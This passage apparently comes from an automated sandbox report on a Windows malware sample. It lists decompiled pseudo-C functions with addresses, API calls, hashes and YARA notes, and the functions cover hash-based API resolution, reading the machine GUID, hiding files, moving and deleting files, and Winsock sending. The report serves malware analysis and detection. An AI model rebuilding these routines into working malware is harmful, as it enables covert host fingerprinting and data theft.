					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                      0x00412d31
                                      0x00412d34
                                      0x00412d39
                                      0x00412d3c
                                      0x00412d49
                                      0x00412d50
                                      0x00412d52
                                      0x00412f24
                                      0x00412f24
                                      0x00412f2b
                                      0x00412f30
                                      0x00412f32
                                      0x00412f37
                                      0x00412f41
                                      0x00412f53
                                      0x00412f53
                                      0x00412f5b
                                      0x00412f60
                                      0x00412d58
                                      0x00412d58
                                      0x00412d63
                                      0x00412d6c
                                      0x00412d73
                                      0x00412d7e
                                      0x00412d7f
                                      0x00412d80
                                      0x00412d81
                                      0x00412d82
                                      0x00412d8f
                                      0x00412da1
                                      0x00412da6
                                      0x00412dae
                                      0x00412db0
                                      0x00412db1
                                      0x00412db5
                                      0x00412dce
                                      0x00412dcf
                                      0x00412dd5
                                      0x00412dda
                                      0x00412db7
                                      0x00412db7
                                      0x00412db8
                                      0x00412dbe
                                      0x00412dc4
                                      0x00412dc9
                                      0x00412dc9
                                      0x00412de2
                                      0x00412de4
                                      0x00412de5
                                      0x00412de7
                                      0x00412de9
                                      0x00412e02
                                      0x00412e03
                                      0x00412e09
                                      0x00412e0e
                                      0x00412deb
                                      0x00412deb
                                      0x00412dec
                                      0x00412df2
                                      0x00412df8
                                      0x00412dfd
                                      0x00412dfd
                                      0x00412e11
                                      0x00412e17
                                      0x00412e19
                                      0x00412e1a
                                      0x00412e1e
                                      0x00412e37
                                      0x00412e38
                                      0x00412e3e
                                      0x00412e43
                                      0x00412e20
                                      0x00412e20
                                      0x00412e21
                                      0x00412e27
                                      0x00412e2d
                                      0x00412e32
                                      0x00412e32
                                      0x00412e4b
                                      0x00412e4d
                                      0x00412e4f
                                      0x00412e7e
                                      0x00412e8a
                                      0x00412e8f
                                      0x00412e51
                                      0x00412e59
                                      0x00412e67
                                      0x00412e6d
                                      0x00412e72
                                      0x00412e72
                                      0x00412e9e
                                      0x00412eaf
                                      0x00412eb4
                                      0x00412ec0
                                      0x00412ece
                                      0x00412edc
                                      0x00412eea
                                      0x00412ef8
                                      0x00412f0f
                                      0x00412f14
                                      0x00412f14
                                      0x00412f17
                                      0x00412f1d
                                      0x00412f1f
                                      0x00000000
                                      0x00412f1f
                                      0x00412f74

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                      • String ID: ckav.ru
                                      • API String ID: 2915393847-2696028687
                                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                      0x00406340
                                      0x00406345
                                      0x00406373
                                      0x00406373
                                      0x00406347
                                      0x0040634f
                                      0x00406354
                                      0x00406357
                                      0x0040635c
                                      0x00406366
                                      0x0040636d
                                      0x00000000
                                      0x00406368
                                      0x00406368
                                      0x00406368
                                      0x00406366
                                      0x0040637a

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser_wmemset
                                      • String ID: CA
                                      • API String ID: 2078537776-1052703068
                                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                      0x00406094
                                      0x004060a8
                                      0x004060ab

                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken
                                      • String ID: IDA
                                      • API String ID: 4114910276-365204570
                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                      0x00402c10
                                      0x00402c15
                                      0x00402c1b
                                      0x00402c1e

                                      APIs
                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: s1@
                                      • API String ID: 190572456-427247929
                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                                      0x00404a56
                                      0x00404a65
                                      0x00404a6a
                                      0x00404ad1
                                      0x00404ad1
                                      0x00404a6c
                                      0x00404a71
                                      0x00404a79
                                      0x00404a85
                                      0x00404a9a
                                      0x00404a9e
                                      0x00404acb
                                      0x00000000
                                      0x00404aa0
                                      0x00404aac
                                      0x00404abc
                                      0x00404ac1
                                      0x00404ac6
                                      0x00404ac6
                                      0x00404a9e
                                      0x00404ad9

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 1425999871-0
                                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402BAB, Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402BAB(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}





                                      0x00402bb2
                                      0x00402bc0
                                      0x00000000
                                      0x00402bc0
                                      0x00402bc7

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 40%
                                      			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                                      0x004060c6
                                      0x004060d5
                                      0x004060d8
                                      0x004060f4
                                      0x004060f6
                                      0x004060fb
                                      0x0040610a
                                      0x00406115
                                      0x0040611c
                                      0x0040611e
                                      0x00406121
                                      0x00000000
                                      0x0040612a
                                      0x0040612f

                                      APIs
                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CheckMembershipToken
                                      • String ID:
                                      • API String ID: 1351025785-0
                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                                      0x00403c68
                                      0x00403c70
                                      0x00403c78
                                      0x00403c82
                                      0x00403c8b
                                      0x00403c8f
                                      0x00403c72
                                      0x00403c76
                                      0x00403c76

                                      APIs
                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                                      0x0040643c
                                      0x00406445
                                      0x00406454

                                      APIs
                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                                      0x00404eed
                                      0x00404ef2
                                      0x00404efd
                                      0x00404efd
                                      0x00404f07
                                      0x00404f0e

                                      APIs
                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                                      0x00403bdd
                                      0x00403beb
                                      0x00403bee

                                      APIs
                                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                                      0x0040428a
                                      0x00404297
                                      0x0040429a

                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                                      0x00404a27
                                      0x00404a35
                                      0x00404a38

                                      APIs
                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C40, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                                      0x00403c4d
                                      0x00403c55
                                      0x00403c58

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                                      0x00403c15
                                      0x00403c1d
                                      0x00403c20

                                      APIs
                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                                      0x00402c2c
                                      0x00402c34
                                      0x00402c37

                                      APIs
                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                                      0x00403bfc
                                      0x00403c04
                                      0x00403c07

                                      APIs
                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
